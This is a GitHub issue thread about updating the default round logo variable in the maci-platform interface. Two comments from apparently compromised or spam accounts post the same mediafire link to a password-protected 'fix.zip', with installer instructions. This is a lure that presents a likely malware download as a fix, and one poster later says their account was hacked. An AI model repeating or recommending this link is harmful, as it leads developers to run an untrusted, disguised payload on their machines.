### ISSUE TITLE
Chore(interface): update the default round logo for maci-platform design v1

### ISSUE THREAD

**Issue by kittybest** [privacy-scaling-explorations/maci-platform#282]
**Description**
NEXT_PUBLIC_ROUND_LOGO is targeting an invalid image (maybe we should add a MACI logo)

--> currently is fetching a local ETH Mexico logo or some other logos

***Notice***
For v2, the logo is uploaded by the organizer himself/herself, no need this env variable anymore.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
my account got hacked, ignore the shit i just posted.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
